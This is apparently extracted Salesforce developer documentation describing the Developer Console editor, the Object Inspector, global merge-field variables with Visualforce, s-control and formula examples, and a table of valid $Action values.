This button allows you to highlight a specified line number. If the line is not currently visible, the editor scrolls to that
line.

Undo ( ) and Redo ( )

Use undo to reverse an editing action and redo to recreate an editing action that was undone.

Font size

Select a font size from the drop-down list to control the size of the characters displayed in the editor.

Line and column position

The line and column position of the cursor is displayed in the status bar at the bottom of the editor. This can be used

with go to line ( ) to quickly navigate through the editor.

Line and character count

The total number of lines and characters is displayed in the status bar at the bottom of the editor.

The editor supports the following keyboard shortcuts:

Tab

Adds a tab at the cursor

SHIFT+Tab

Removes a tab

CTRL+f

Opens the search dialog or searches for the next occurrence of the current search

CTRL+r

Opens the search dialog or replaces the next occurrence of the current search with the specified replacement string

CTRL+g

Opens the go to line dialog
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CTRL+s

Performs a quick save.

CTRL+z

Reverses the last editing action

CTRL+y

Recreates the last editing action that was undone

See Also:
Apex Code Overview
Visualforce Overview

Source Code Editor
The Developer Console includes a Source Code Editor with a collection of features for editing Apex and Visualforce code.

All code files, including Apex classes and triggers, and Visualforce pages and components, open in the Source Code Editor
in the Developer Console workspace.

The syntax highlighting in the Source Code Editor calls out comments, numbers, strings, reserved keywords, primitive data
types, variable declarations, and references.

After you implement testing, you can view line-by-line code coverage in the Source Code Editor. See Checking Code Coverage.
The Source Code Editor also allows you to set checkpoints to troubleshoot without updating your code. See Setting Checkpoints
in Apex Code.
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Navigating to Method and Variable Declarations

You can navigate directly to a method or variable declaration, rather than having to scroll or search to find it.

1. Mouse over a method or variable name. If the method or variable name is underlined, you can navigate to its declaration.
2. Click in an underlined method or variable name.
3. Press CTRL+ALT+N or click Go To to move the cursor to the declaration. If the declaration is in another file, the file

opens in a new tab.

Using Code Completion

The Source Code Editor provides autocomplete suggestions while you are writing code.

• In Visualforce pages and components, auto-complete appears automatically as you type.
• In Apex classes and triggers, click CTRL+SPACE to view a list of suggested completions. Completions are provided for

Apex system objects and methods, user-defined objects and methods, and sObjects and fields.

Keep typing to filter the suggestions, press ENTER to select the top completion, or use the arrow keys or mouse to select a
different completion.

Completions are gathered from the object you are currently working on. If you don’t see the completion you expect, save the
open object and refresh. The object's type is determined by the current editor's symbol table. If there are no symbols that
match, cached symbol tables (the last valid save) are also checked. If there is no current object, the autocomplete window shows
all system and user classes, as well as sObjects.

Validating Changes in Source Code: Problems Tab

Changes you make in the Source Code Editor are compiled and validated in the background. While you’re editing code, an
error indicator displays on lines with errors, and the Problems tab in the lower panel shows the details of compilation errors.

To collapse the Problems tab, use the  button in the corner of the panel.

When source views are validated, all modified sources are validated together instead of individually. Changes that might be
inconsistent with code on the server, but are consistent when validated as a group—such as adding a method in one file and
calling that method in another—will not be reported as errors.

Saving Changes

When you make changes in the Source Code Editor, the name of the tab displays a “*” to indicate unsaved changes. Click
File > Save in the corner of a source view or click CTRL+S to save your changes. Apex classes and triggers are saved with the
latest API version.

To save a collection of changes with dependencies, click File > Save All or CTRL+S+SHIFT. All open tabs with modifications
are saved together in one request.
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When you save modified source views, they’re validated against all saved source files. If source files have related changes, it is
not possible to save the files individually. If there are any compilation errors, you will not be able to save. Review the Problems
panel, correct any errors, and click Save again.

Note:  You can’t edit and save Apex classes in a production organization.

Staying in Sync with Code in the Cloud

The Developer Console tracks changes made to the source by other users while you have a file open. If you haven’t made any
changes, your view will be updated automatically. If you’ve made modifications, you won’t be able to save them to the server.
You’ll see an alert that another user has made changes, with the option to update the source view to the latest version.

Warning:  If you choose to update to the latest version of a file, your changes will be overwritten. Copy your version
out of the source view to preserve it, then update to the latest version and integrate your modifications.

See Also:
Developer Console User Interface Overview
Checking Code Coverage
Setting Checkpoints in Apex Code
File Menu

Object Inspector
The Object Inspector provides a read-only reference for the fields of a standard or custom object, and their data types. To
open the Object Inspector, click File > Open and select the object you want to view. To search for objects that meet specific
criteria, use the Query Editor.
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Note:  You can't modify custom objects in the Developer Console. To create, edit, or delete custom objects, from
Setup, click Create > Objects.

See Also:
Using the Developer Console

Understanding Global Variables
S-controls and formulas available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

Custom buttons and links are available in: All Editions

Visualforce available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

$Profile global merge field type available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom s-controls, formulas, or
Visualforce pages:

Components such as s-controls, custom buttons, custom links, formulas, and Visualforce pages allow you to use special merge
fields to reference the data in your organization. Use the following global variables when choosing a merge field type to add
to your custom component:

$Action

A global merge field type to use when referencing standard
Salesforce actions such as displaying the Accounts tab home

Description:

page, creating new accounts, editing accounts, and deleting
accounts. Use action merge fields in LINKTO and URLFOR
functions to reference the action selected.

Use: 1. Select the field type: $Action.
2. Insert a merge field in the format

$Action.object.action, such as
$Action.Account.New.

The s-control below references the standard action for creating
new accounts in the $Action.Account.New merge field.

<html> <body> {!LINKTO("Create a New
Account",

S-Control Example:

$Action.Account.New,
$ObjectType.Account)} </body> </html>
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<apex:outputLink
value="{!URLFOR($Action.Account.New)}">Create
New Account</apex:outputLink>

Visualforce Example:

This global variable is only available for custom buttons and
links, s-controls, and Visualforce pages.

Tips:

All objects support basic actions, such as new, clone, view, edit, list, and delete. The $Action global also references actions
available on many standard objects. The values available in your organization may differ depending on the features you enable.

$Api

A global merge field type to use when referencing API URLs.Description:

Use: 1. Select the field type: $Api.
2. Select a merge field, such as:

• $Api.Enterprise_Server_URL__xxx: The
Enterprise WSDL SOAP endpoint where xxx
represents the version of the API. For example,
$Api.Enterprise_Server_URL_140 is the merge
field value for version 14.0 of the API.

• $Api.Partner_Server_URL__xxx: The Partner
WSDL SOAP endpoint where xxx represents the
version of the API..

• $Api.Session_ID: The session ID.

The custom formula field below calls a service to replace the
SIC code. Replace myserver with the name of your server.

HYPERLINK("https://www.myserver.com/mypage.jsp"
&

S-Control Example:

"?Username=" & $User.Username &
"&crmSessionId=" & GETSESSIONID() &
"&crmServerUrl=" &
$Api.Partner_Server_URL_90 &
"&crmObjectId=" & Id &
"&crmFieldUpdate=sicCode",
"Update SIC Code")

Use dot notation to return the session ID.
{!$Api.Session_ID}

Visualforce Example:

This global variable is only available for formula fields,
s-controls, custom buttons and links, and Visualforce pages.

Tips:
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$Component

A global merge field type to use when referencing a Visualforce
component.

Description:

Each component in a Visualforce page has its own Id attribute.
When the page is rendered, this attribute is used to generate

Use:

the Document Object Model (DOM) ID. Use
$Component.Path.to.Id in JavaScript to reference a
specific component on a page, where Path.to.Id is a
component hierarchy specifier for the component being
referenced.

function beforeTextSave() {Visualforce Example:

document.getElementById('{!$Component.msgpost}').value
= myEditor.getEditorHTML();
}

This global variable is only available for Visualforce pages.Tips:

$ComponentLabel

A global merge field to use when referencing the label of an inputField component
on a Visualforce page that is associated with a message.

Description:

Return the label of an inputField component that is associated with a message.Use:

<apex:datalist var="mess" value="{!messages}">
<apex:outputText value="{!mess.componentLabel}:"

Visualforce Example:

style="color:red"/>
<apex:outputText value="{!mess.detail}" style="color:black"
/>
</apex:datalist>

This global variable is only available for Visualforce pages.Tips:

$CurrentPage

A global merge field type to use when referencing the current Visualforce page or page request.Description:

Use this global in a Visualforce page to reference the current page name ($CurrentPage.Name)
or the URL of the current page ($CurrentPage.URL). Use

Use:

$CurrentPage.parameters.parameterName to reference page request parameters and values,
where parameterName is the request parameter being referenced.

<apex:page standardController="Account">
<apex:pageBlock title="Hello {!$User.FirstName}!">

Visualforce Example:

You belong to the {!account.name} account.<br/>
You're also a nice person.

</apex:pageBlock>
<apex:detail subject="{!account}" relatedList="false"/>
<apex:relatedList list="OpenActivities"
subject="{!$CurrentPage.parameters.relatedId}"/>

</apex:page>
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This global variable is only available for Visualforce pages.Tips:

$Label

A global merge field type to use when referencing a custom
label in a Visualforce page.

Description:

Use this expression in a Visualforce page to access a custom
label. When the application server constructs the page to be

Use:

presented to the end-user’s browser, the value returned depends
upon the language setting of the contextual user. The value
returned is one of the following, in order of precedence:
1. the local translation’s text
2. the packaged translation’s text
3. the master label’s text

<apex:page>
<apex:pageMessage severity="info"

Visualforce Example:

strength="1"
summary="{!$Label.firstrun_helptext}"
/>

</apex:page>

This global variable is only available for Visualforce pages.Tips:

$Label.Site

A global merge field type to use when referencing a standard Sites label in a Visualforce page. Like
all standard labels, the text will display based on the user’s language and locale.

Description:

Use this expression in a Visualforce page to access a standard Sites label. When the application server
constructs the page to be presented to the end-user’s browser, the value returned depends on the
language and locale of the user.

Salesforce provides the following labels:

MessageLabel

Use:

Authorization Requiredauthorization_required

Bandwidth Limit Exceededbandwidth_limit_exceeded

Change Passwordchange_password

Change Your Passwordchange_your_password

If you have forgotten your password, click Forgot
Password to reset it.

click_forget_password

Nicknamecommunity_nickname

Confirm Passwordconfirm_password

<i>{0}</i> is down for maintenancedown_for_maintenance
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MessageLabel

Emailemail

email usemail_us

Did you forget your password? Please enter your username
below.

enter_password

Error: {0}error

Errorerror2

File Not Foundfile_not_found

Forgot Passwordforgot_password

Forgot Password Confirmationforgot_password_confirmation

Forgot Your Password?forgot_your_password_q

Please <a href="{0}">{1}</a> if you need to get in touch.get_in_touch

Go to Login Pagego_to_login_page

/img/sitesimg_path

Down For Maintenancein_maintenance

Limit Exceededlimit_exceeded

Loginlogin

Loginlogin_button

You must first log in or register before accessing this page.login_or_register_first

Logoutlogout

New Passwordnew_password

New User?new_user_q

Old Passwordold_password

Page Not Foundpage_not_found

Page Not Found: {0}page_not_found_detail

Passwordpassword

Passwords did not match.passwords_dont_match

Powered bypowered_by

Registerregister

Registration Confirmationregistration_confirmation

Site Loginsite_login

Site Under Constructionsite_under_construction

Sorry for the inconvenience.sorry_for_inconvenience

Sorry for the inconvenience. We'll be back shortly.sorry_for_inconvenience_back_shortly
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MessageLabel

Stay tuned.stay_tuned

Submitsubmit

An email has been sent to you with your temporary
password.

temp_password_sent

Thank you for registering. An email has been sent to you
with your temporary password.

thank_you_for_registering

<i>{0}</i> is under constructionunder_construction

New User Registrationuser_registration

Usernameusername

Verify New Passwordverify_new_password

<apex:page>
<apex:pageMessage severity="info"

Visualforce Example:

strength="1"
summary="{!$Label.Site.temp_password_sent}"
/>

</apex:page>

This global variable is only available for Visualforce pages.Tips:

$ObjectType

A global merge field type to use when referencing standard
or custom objects (such as Accounts, Cases, or Opportunities)

Description:

and the values of their fields. Use object type merge fields in
LINKTO, GETRECORDIDS, and URLFOR functions to reference
a specific type of data or the VLOOKUP function to reference
a specific field in a related object.

Use: 1. Select the field type: $ObjectType.
2. Select an object to insert a merge field representing that

object, such as $ObjectType.Case.

Optionally, select a field on that object using the following
syntax:
$ObjectType.Role_Limit__c.Fields.Limit__c.

The custom list button below references the cases standard
object in the $ObjectType.Case merge field.

{!REQUIRESCRIPT
("/soap/ajax/13.0/connection.js")} var

Custom Button Example:

records =

{!GETRECORDIDS($ObjectType.Sample)}; var
newRecords = []; if (records[0] == null) {
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alert("Please select at least one row") }
else {

for (var n=0;
n<records.length; n++) { var c = new
sforce.SObject("Case"); c.id = records[n];
c.Status = "New";

newRecords.push(c); }
result =
sforce.connection.update(newRecords);
window.location.reload(); }

This example checks that a billing postal code is valid by
looking up the first five characters of the value in a custom

Validation Rule Example:

object called Zip_Code__c that contains a record for every
valid zip code in the US. If the zip code is not found in the
Zip_Code__c object or the billing state does not match the
corresponding State_Code__c in the Zip_Code__c object, an
error is displayed.

AND( LEN(BillingPostalCode) > 0,
OR(BillingCountry = "USA", BillingCountry =
"US"),

VLOOKUP(
$ObjectType.Zip_Code__c.Fields.State_Code__c,
$ObjectType.Zip_Code__c.Fields.Name,
LEFT(BillingPostalCode,5)) <>

BillingState )

The following example retrieves the label for the Account
Name field:

{!$ObjectType.Account.Fields.Name.Label}

Visualforce Example:

This global variable is available in Visualforce pages, custom
buttons and links, s-controls, and validation rules.

Tips:

$Organization

A global merge field type to use when referencing information
about your company profile. Use organization merge fields to
reference your organization’s city, fax, ID, or other details.

Description:

Use: 1. Select the field type: $Organization.
2. Select a merge field such as $Organization.Fax.

Use organization merge fields to compare any attribute for
your organization with that of your accounts. For example,

Validation Rule Example:

you may want to determine if your organization has the same
country as your accounts. The validation formula below
references your organization’s country merge field and requires
a country code for any account that is foreign.
AND($Organization.Country <> BillingCountry,
ISBLANK(Country_Code__c))
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Use dot notation to access your organization’s information.
For example:

{!$Organization.Street}
{!$Organization.State}

Visualforce Example:

The organization merge fields get their values from whatever
values are currently stored as part of your company information
in Salesforce.

Tips:

Note that {!$Organization.UiSkin} is a picklist value,
and so should be used with picklist functions such as
ISPICKVAL() in custom fields, validation rules, and
Visualforce expressions.

$Page

A global merge field type to use when referencing a Visualforce
page.

Description:

Use this expression in a Visualforce page to link to another
Visualforce page.

Use:

<apex:page>
<h1>Linked</h1>

Visualforce Example:

<apex:outputLink
value="{!$Page.otherPage}">

This is a link to another page.
</apex:outputLink>

</apex:page>

This global variable is only available for Visualforce pages.Tips:

$Profile

A global merge field type to use when referencing information
about the current user’s profile. Use profile merge fields to

Description:

reference information about the user’s profile such as license
type or name.

Use: 1. Select the field type: $Profile.
2. Select a merge field such as $Profile.Name.

The validation rule formula below references the profile name
of the current user to ensure that only the record owner or

Validation Rule Example:

users with this profile can make changes to a custom field
called Personal Goal:

AND( ISCHANGED( Personal_Goal__c ), Owner
<> $User.Id, $Profile.Name <>

"Custom: System Admin" )
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To return the current user's profile, use the following:
{$Profile.Name}

Visualforce Example:

Tips: • $Profile merge fields are only available in Editions that
can create custom profiles.

• Use profile names to reference standard profiles in
$Profile merge fields. If you previously referenced the
internal value for a profile, use the following list to
determine the name to use instead:

$Profile ValueStandard Profile
Name

PT1System Administrator

PT2Standard User

PT3Ready Only

PT4Solution Manager

PT5Marketing User

PT6Contract Manager

PT7Partner User

PT8Standard Platform
User

PT9Standard Platform
One App User

PT13Customer Portal User

PT14Customer Portal
Manager

• Your merge field values will be blank if the profile
attributes are blank. For example profile Description
is not required and may not contain a value.

• You don’t need to give users permissions or access rights
to their profile information to use these merge fields.

$RecordType

A global merge field to use when referencing the record type
of the current record.

Description:

Add $RecordType manually to your s-control.Use:

To return the ID of the current record type, use the following:
{$RecordType.Id}

Visualforce Example:
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Tips: • Use $RecordType.Id instead of $RecordType.Name
to reference a specific record type. While
$RecordType.Name makes a formula more readable, you
must update the formula if the name of the record type
changes, whereas the ID of a record type never changes.
However, if you are deploying formulas across
organizations (for example, between sandbox and
production), use $RecordType.Name because IDs are
not the same across organizations.

• Avoid using $RecordType in formulas, except in default
value formulas. Instead, use the RecordType merge field
(for example, Account.RecordType.Name) or the
RecordTypeId field on the object.

• Don’t reference any field with the $RecordType merge
field in cross-object formulas. The $RecordType variable
resolves to the record containing the formula, not the
record to which the formula spans. Use the RecordType
merge field on the object instead.

$Request

A global merge field to use when referencing a query parameter
by name that returns a value.

Description:

Add $Request manually to your s-control.Use:

The snippet below, named Title_Snippet, requires two
input parameters: titleTheme and titleText. You can

S-Control Example:

reuse it in many s-controls to provide page title and theme in
your HTML.

<h2

class=”{!$Request.titleTheme}.title”>
{!$Request.titleText}</h2>

The s-control below calls this snippet using the INCLUDE
function, sending it the parameters for both the title and theme
of the HTML page it creates.

<html> <head> </head> <body> {!

INCLUDE($SControl.Title_Snippet, [titleTheme
= "modern", titleText = "My Sample Title"])
} ... Insert your page specific content

here ... </body> </html>

Don’t use $Request in Visualforce pages to reference query
parameters. Use $CurrentPage instead.

Tips:
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$Resource

A global merge field type to use when referencing an existing
static resource by name in a Visualforce page. You can also

Description:

use resource merge fields in URLFOR functions to reference a
particular file in a static resource archive.

Use $Resource to reference an existing static resource. The
format is $Resource.nameOfResource, such as
$Resource.TestImage.

Use:

The Visualforce component below references an image file
that was uploaded as a static resource and given the name
TestImage:

<apex:image url="{!$Resource.TestImage}"
width="50" height="50"/>

Visualforce Examples:

To reference a file in an archive (such as a .zip or .jar file),
use the URLFOR function. Specify the static resource name
that you provided when you uploaded the archive with the
first parameter, and the path to the desired file within the
archive with the second. For example:

<apex:image url="{!URLFOR($Resource.TestZip,

'images/Bluehills.jpg')}"
width="50" height="50"/>

This global variable is only available for Visualforce pages.Tips:

$SControl

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

A global merge field type to use when referencing an existing
custom s-control by name. Use s-control merge fields in

Description:

LINKTO, INCLUDE, and URLFOR functions to reference one
of your custom s-controls.

Use: 1. Select the field type: $SControl.
2. Select an s-control to insert a merge field representing that

s-control, such as $Scontrol.Header_Snippet.

The s-control below references the snippet in the
$Scontrol.Header_Snippet merge field:

<html> <body> {!
INCLUDE($SControl.Header_Snippet, [title =

S-Control Example:

"My Title",
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theme = "modern"])}
</body> </html>

The following example shows how to link to an s-control
named HelloWorld in a Visualforce page:

<apex:page>
<apex:outputLink

Visualforce Example:

value="{!$SControl.HelloWorld}">Open the
HelloWorld s-control</apex:outputLink>
</apex:page>

Note that if you simply want to embed an s-control in a page,
you can use the <apex:scontrol> tag without the
$SControl merge field. For example:

<apex:page>
<apex:scontrol controlName="HelloWorld" />
</apex:page>

Tips: • The drop-down list for Insert Merge Field lists all
your custom s-controls except snippets. Although snippets
are s-controls, they behave differently. For example, you
can’t reference a snippet from a URLFOR function directly;
snippets are not available when creating a custom button
or link that has a Content Source of Custom S-Control;
and you can’t add snippets to your page layouts. To insert
a snippet in your s-control, use the Insert Snippet
drop-down button.

• This global variable is only available for custom buttons
and links, s-controls, and Visualforce pages.

$Setup

A global merge field type to use when referencing a custom
setting of type “hierarchy.”

Description:

Use $Setup to access hierarchical custom settings and their
field values using dot notation. For example,
$Setup.App_Prefs__c.Show_Help_Content__c.

Use:

Hierarchical custom settings allow values at any of three
different levels:

1. Organization, the default value for everyone
2. Profile, which overrides the Organization value
3. User, which overrides both Organization and Profile values

Salesforce automatically determines the correct value for this
custom setting field based on the running user’s current
context.
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{!$Setup.CustomSettingName__c.CustomFieldName__c}Formula Field Example:

Formula fields only work for hierarchy custom settings; they
can’t be used for list custom settings.

The following example illustrates how to conditionally display
an extended help message for an input field, depending on
the user’s preference:

<apex:page>
<apex:inputField

Visualforce Example:

value="{!usr.Workstation_Height__c}"/>
<apex:outputPanel

id="helpWorkstationHeight"

rendered="{!$Setup.App_Prefs__c.Show_Help_Content__c}">

Enter the height for your
workstation in inches, measured from the

floor to top of the work surface.
</apex:outputPanel>
...

</apex:page>

If the organization level for the custom setting is set to true,
users see the extended help message by default. If an individual
prefers to not see the help messages, they can set their custom
setting to false, to override the organization (or profile)
value.

Custom settings of type “list” aren’t available on Visualforce
pages using this global variable. You can access list custom
settings in Apex.

This global variable is available in Visualforce pages, formula
fields, and validation rules.

Tips:

$Site

A global merge field type to use when referencing information about the current Force.com site.Description:

Use dot notation to access information about the current Force.com site. Note that only the following
site fields are available:

DescriptionMerge Field

Use:

Returns the API name of the current site.$Site.Name

Returns the Force.com domain name for your organization.$Site.Domain

Returns the value of the Custom Web Address field for the
current site.

$Site.CustomWebAddress

Returns the original URL for this page if it’s a designated
error page for the site; otherwise, returns null.

$Site.OriginalUrl
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DescriptionMerge Field

Returns the value of the site URL for the current request (for
example, http://myco.com/ or
https://myco.force.com/prefix/).

$Site.CurrentSiteUrl

Returns true if the current site is associated with an active
login-enabled portal; otherwise returns false.

$Site.LoginEnabled

Returns true if the current site is associated with an active
self-registration-enabled Customer Portal; otherwise returns
false.

$Site.RegistrationEnabled

For authenticated users, returns true if the currently
logged-in user's password is expired. For non-authenticated
users, returns false.

$Site.IsPasswordExpired

Returns the value of the Site Contact field for the current
site.

$Site.AdminEmailAddress

Returns the URL path prefix of the current site. For example,
if your site URL is myco.force.com/partners, partners

$Site.Prefix

is the path prefix. Returns null if the prefix is not defined, or
if the page was accessed using a custom Web address.

Returns the template name associated with the current site;
returns the default template if no template has been
designated.

$Site.Template

Returns an error message for the current page if it’s a
designated error page for the site and an error exists; otherwise,
returns an empty string.

$Site.ErrorMessage

Returns the error description for the current page if it’s a
designated error page for the site and an error exists; otherwise,
returns an empty string.

$Site.ErrorDescription

The tracking code associated with your site. This code can be
used by services like Google Analytics to track page request
data for your site.

$Site.AnalyticsTrackingCode

The following example shows how to use the $Site.Template merge field:

<apex:page title="Job Application Confirmation" showHeader="false"
standardStylesheets="true">

Visualforce Example:

<!-- The site template provides layout & style for the site -->
<apex:composition template="{!$Site.Template}">

<apex:define name="body">
<apex:form>

<apex:commandLink value="<- Back to Job Search"
onclick="window.top.location='{!$Page.PublicJobs}';return

false;"/>
<br/>
<br/>
<center>

<apex:outputText value="Your application has been saved.
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Thank you for your interest!"/>
</center>
<br/>
<br/>

</apex:form>
</apex:define>

</apex:composition>
</apex:page>

This global variable is available in Visualforce pages, email templates, and s-controls.Tips:

$System.OriginDateTime

A global merge field that represents the literal value of
1900-01-01 00:00:00. Use this global variable when

Description:

performing date/time offset calculations, or to assign a literal
value to a date/time field.

Use: 1. Select the field type: $System.
2. Select OriginDateTime from the Insert Merge

Field option.

The example below illustrates how to convert a date field into
a date/time field. It uses the date in the OriginDateTime

Formula Example:

merge field to get the number of days since a custom field
called My Date Field. Then, it adds the number of days to
the OriginDateTime value.

$System.OriginDatetime + ( My_Date_Field__c
- DATEVALUE($System.OriginDatetime) )

Note: OriginDateTime is in the GMT time zone
but the result is displayed in the user’s local time zone.

The following example calculates the number of days that have
passed since January 1, 1900:

{!NOW() - $System.OriginDateTime}

Visualforce Example:

This global variable is available in Visualforce pages, default
values, field updates, formula fields, s-controls, and validation
rules.

Tips:
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$User

A global merge field type to use when referencing information
about the current user. User merge fields can reference
information about the user such as alias, title, and ID.

Description:

Use: 1. Select the field type: $User.
2. Select a merge field such as $User.Username.

The validation rule formula below references the ID of the
current user to determine if the current user is the owner of

Validation Rule Example:

the record. Use an example like this to ensure that only the
record owner or users with an administrator profile can make
changes to a custom field called Personal Goal:

AND( ISCHANGED( Personal_Goal__c ), Owner
<> $User.Id, $Profile.Name <>

"Custom: System Admin" )

The following example displays the current user’s company
name, as well as the status of the current user (which returns
a Boolean value).

<apex:page>
<h1>Congratulations</h1>

Visualforce Example:

This is your new Apex Page
<p>The current company name for this

user is: {!$User.CompanyName}</p>
<p>Is the user active?

{!$User.isActive}</p>
</apex:page>

Tips: • The current user is the person changing the record that
prompted the default value, validation rule, or other
operation that uses these global merge fields.

• When a Web-to-Case or Web-to-Lead process changed
a record, the current user is the Default Lead Owner
or Default Case Owner.

• When a workflow field update changes a record, the user
is the Default Workflow User.

• Some of the $User merge fields can be used in mobile
configuration filters.

$User.UITheme and $User.UIThemeDisplayed

These global merge fields identify the Salesforce look and feel
a user sees on a given Web page.

The difference between the two variables is that
$User.UITheme returns the look and feel the user is supposed

Description:

to see, while $User.UIThemeDisplayed returns the look
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and feel the user actually sees. For example, a user may have
the permissions to see the new user interface theme look and
feel, but if they are using a browser that doesn’t support that
look and feel, for example, Internet Explorer 6,
$User.UIThemeDisplayed returns a different value.

Use these variables to identify the CSS used to render
Salesforce web pages to a user. Both variables return one of
the following values:

Use:

• Theme1—Obsolete Salesforce theme
• Theme2—Salesforce theme used prior to Spring ’10
• PortalDefault—Salesforce Customer Portal theme
• Webstore—Salesforce AppExchange theme
• Theme3—Current Salesforce theme, introduced during

Spring ’10

The following example shows how you can render different
layouts based on a user’s theme:

<apex:page>
<apex:pageBlock title="My Content"

Visualforce Example:

rendered="{!$User.UITheme == 'Theme2'}">
// this is the old theme...

</apex:pageBlock>

<apex:pageBlock title="My Content"
rendered="{!$User.UITheme == 'Theme3'}">

//this is the new theme ...
</apex:pageBlock>

</apex:page>

$UserRole

A global merge field type to use when referencing information
about the current user’s role. Role merge fields can reference
information such as role name, description, and ID.

Description:

Use: 1. Select the field type: $UserRole.
2. Select a merge field such as $UserRole.Name.

The validation rule formula below references the user role
name to validate that a custom field called Discount

Validation Rule Example:

Percent does not exceed the maximum value allowed for
that role:

Discount_Percent__c >
VLOOKUP($ObjectType.Role_Limits__c.Fields.Limit__c,

$ObjectType.Role_Limits__c.Fields.Name,
$UserRole.Name)
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{!$UserRole.LastModifiedById}Visualforce Example:

Tips: • The current user is the person changing the record that
prompted the default value, validation rule, or other
operation that uses these global merge fields.

• When a Web-to-Case or Web-to-Lead process changed
a record, the current user is the Default Lead Owner
or Default Case Owner.

• When a workflow field update changes a record, the user
is the Default Workflow User.

Note:  You can’t use the following $UserRole values
in Visualforce:

• CaseAccessForAccountOwner

• ContactAccessForAccountOwner

• OpportunityAccessForAccountOwner

• PortalType

See Also:
Valid Values for the $Action Global Variable

Valid Values for the $Action Global Variable
$Action global variable available in: All Editions

User Permissions Needed

"Customize Application"To create, edit, and delete custom s-controls, formulas, or
Visualforce pages:

The following table lists the actions you can reference with the $Action global variable and the objects on which you can
perform those actions. All objects support basic actions, such as new, clone, view, edit, list, and delete. The $Action global
also references actions available on many standard objects. The values available in your organization may differ depending on
the features you enable.

ObjectsDescriptionValue

Accept a record.Accept • Ad group

• Case

• Event
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• Google campaign

• Keyword

• Lead

• Search phrase

• SFGA version

• Text ad

ContractActivate a contract.Activate

Product2Add a product to a price book.Add

CampaignAdd a member to a campaign.AddCampaign

OpportunityAdd a campaign to an opportunity's list
of influential campaigns.

AddInfluence

OpportunityLineItemAdd a product to price book.AddProduct

Add a contact or lead to a campaign.AddToCampaign • Contact

• Lead

EventAdd an event to Microsoft Outlook.AddToOutlook

CampaignLaunch campaign advanced setup.AdvancedSetup

Launch www.altavista.com/news/.AltavistaNews • Account

• Lead

EventCancel an event.Cancel

SolutionSpecify a case for a solution.CaseSelect

Change the owner of a record.ChangeOwner • Account

• Ad group

• Campaign

• Case

• Contact

• Contract

• Google campaign

• Keyword

• Leads

• Opportunities

• Search phrase

• SFGA version

• Text ad

Change the status of a case.ChangeStatus • Case

• Lead
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OpportunityLineItemChoose the price book to use.ChoosePricebook

Clone a record.Clone • Ad group

• Asset

• Campaign

• Campaign member

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity

• Product

• Search phrase

• SFGA version

• Text ad

• Custom objects

CaseCreate a related case with the details of
a parent case.

CloneAsChild

CaseClose a case.CloseCase

LeadCreate a new account, contact, and
opportunity using the information from
a lead.

Convert

Campaign MemberConvert a lead to a campaign member.ConvertLead

Campaign MemberCreate an opportunity based on a
campaign member.

Create_Opportunity

EventDecline an event.Decline

Delete a record.Delete • Ad group

• Asset

• Campaign

• Campaign member

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity
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• Opportunity product

• Product

• Search phrase

• SFGA version

• Solution

• Task

• Text ad

• Custom objects

Delete a series of events or tasks.DeleteSeries • Event

• Task

ContactDisable a Customer Portal user.DisableCustomerPortal

AccountDisable a Customer Portal account.DisableCustomerPortalAccount

ContactDisable a Partner Portal user.DisablePartnerPortal

AccountDisable a Partner Portal account.DisablePartnerPortalAccount

Download an attachment.Download • Attachment

• Document

Edit a record.Edit • Ad group

• Asset

• Campaign

• Campaign member

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity

• Opportunity product

• Product

• Search phrase

• SFGA version

• Solution

• Task

• Text ad

• Custom objects

OpportunityLineItemEdit all products in a price book.EditAllProduct
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AccountDesignate an account as a partner
account.

EnableAsPartner

ContactEnable a contact as a Partner Portal user.EnablePartnerPortalUser

ContactEnable a contact as a Self-Service user.EnableSelfService

LeadDisplay duplicate leads.FindDup

EventCreate a follow-up event.FollowupEvent

EventCreate a follow-up task.FollowupTask

Display a Hoovers profile.HooversProfile • Account

• Lead

AccountInclude an account record in Connect
Offline.

IncludeOffline

Plot an address on Google Maps.GoogleMaps • Account

• Contact

• Lead

Display www.google.com/news.GoogleNews • Account

• Contact

• Lead

Display www.google.com.GoogleSearch • Account

• Contact

• Lead

List records of an object.List • Ad group

• Campaign

• Case

• Contact

• Contract

• Google campaign

• Keyword

• Lead

• Opportunity

• Product

• Search phrase

• SFGA version

• Solution

• Text ad

• Custom objects

ActivityLog a call.LogCall
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ActivityGenerate a mail merge.MailMerge

CampaignLaunch the Manage Members page.ManageMembers

CaseClose multiple cases.MassClose

ContactMerge contacts.Merge

Create a new record.New • Activity

• Ad group

• Asset

• Campaign

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity

• Search phrase

• SFGA version

• Solution

• Task

• Text ad

• Custom objects

TaskCreate a task.NewTask

Request an update.RequestUpdate • Contact

• Activity

SolutionRegister a user as a Self Service user.SelfServSelect

ActivitySend an email.SendEmail

Open a blank email in Gmail.SendGmail • Contact

• Lead

OpportunityLineItemSort products in a price book.Sort

Share a record.Share • Account

• Ad group

• Campaign

• Case

• Contact

• Contract

• Google campaign
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• Keyword

• Lead

• Opportunity

• Search phrase

• SFGA version

• Text ad

Submit a record for approval.Submit for Approval • Account

• Activity

• Ad group

• Asset

• Campaign

• Campaign member

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity

• Opportunity product

• Product

• Search phrase

• SFGA version

• Solution

• Task

• Text ad

Access the tab for an object.Tab • Ad group

• Campaign

• Case

• Contact

• Contract

• Google campaign

• Keyword

• Lead

• Opportunity

• Product

• Search phrase

• SFGA version

• Solution

• Text ad
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View a record.View • Activity

• Ad group

• Asset

• Campaign

• Campaign member

• Case

• Contact

• Contract

• Event

• Google campaign

• Keyword

• Lead

• Opportunity

• Opportunity product

• Product

• Search phrase

• SFGA version

• Solution

• Text ad

• Custom objects

CampaignList all campaign members.ViewAllCampaignMembers

CampaignDisplay the Campaigns with Influenced
Opportunities report.

ViewCampaignInfluenceReport

ContactList all Partner Portal users.ViewPartnerPortalUser

ContactList all Self-Service users.ViewSelfService

Plot an address on Yahoo! Maps.YahooMaps • Account

• Contact

• Lead

ContactDisplay
http://weather.yahoo.com/.

YahooWeather

See Also:
Understanding Global Variables
